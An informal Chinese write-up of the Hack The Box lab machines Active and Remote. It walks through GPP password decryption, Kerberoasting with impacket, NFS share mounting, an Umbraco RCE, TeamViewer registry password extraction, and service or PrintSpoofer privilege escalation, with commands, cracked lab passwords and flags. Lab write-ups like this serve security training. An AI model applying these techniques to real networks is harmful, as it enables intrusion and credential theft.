HTB-oscplike-Active+Remote
Active
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
直接smbclient进去Replication嗯找 最后在Groups.xml找到一段
name=“active.htb\SVC_TGS”
cpassword=“edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”
这勾八怎么解 查了查发现是老的GPPXML可以用gpp-decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
然后以这个可以去NETLOGON、Replication、SYSVOL、Users
在User里可以直接找到flag d21ad3127a11d4f01e4fe7f2318285b4
但是到这突然就断了 思来想去重回开头开冲88端口
impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
得到
$krb5tgs
23
23
23Administrator
A
C
T
I
V
E
.
H
T
B
ACTIVE.HTB
ACTIVE.HTBactive.htb/Administrator$237a9…
一堆哈希 解出来密码是 Ticketmaster1968
smbmap可以读写c$了 登上去拿到root的flag
af43ccf8848ffc369eac16a900854cfe
Remote
easy难度的remote 靶机IP 10.10.10.180
sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.180
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
80进去发现是umbraco 可以searchsploit但是不知道版本
ftp和smbmap都没东西 这里删了一些细节就是111下面有nfs挂载
showmount --exports 10.10.10.180
/site_backups (everyone)
sudo mount -t nfs 10.10.10.180:/site_backups /tmp/t
然后就是嗯翻文件 其中umbraco里给了一堆骗人的东西
ping.aspx里就一句i’m alive之类的
翻翻翻后总体里面就两个收获 一个是确定了版本7.12.4
另一个是得到了用户名admin@htb.local和哈希 解出来是baconandcheese
然后用7.12.4版本的rce 这个现成的脚本有几个坑点我搞了半天
但是我不说 为什么不说 因为我没素质
连上去拿到user的flag cc2f7e8042417aa73fcdb934a2713dc1
接下来提权 进去netstat -ano看到5939端口被本地监听 PID是2304
tasklist | findstr 2304 看到是teamviewer
where.exe /R c:\ teamviewer*.* 找到路径且发现版本是7
searchsploit找不到东西 但是google可以看到
https://whynotsecurity.com/blog/teamviewer/
找到那就简单了cd HKLM:\software\wow6432node\teamviewer\version7进入注册表
get-itemproperty -path . 看到securitypasswordaes 导出来
(get-itemproperty -path .).securitypasswordaes
然后拿给的脚本解密就行了 多写两行转一下16进制即可
运行得到ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5b
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …
None
!R3m0te!
然后5985开着 直接evil-winrm登上去就行了 拿到root的flag
c35a9bbf8c3f7a7e5ee80c62b3d62e1b
但是其实这台机子不止一种提权方法
一方面whoami /all会发现土豆一家是可以用的
但是版本是2019的 所以普通土豆不行 要用PrintSpoofer 也是可以提权的
另一方面 winpeas在扫的时候可以看到UsoSvc: AllAccess, Start
很明显是sc提权了 sc停掉服务 然后改binpath到你的shell上再启动就提权了
但是我感觉第一个提权才是他想考的 要不也太简单了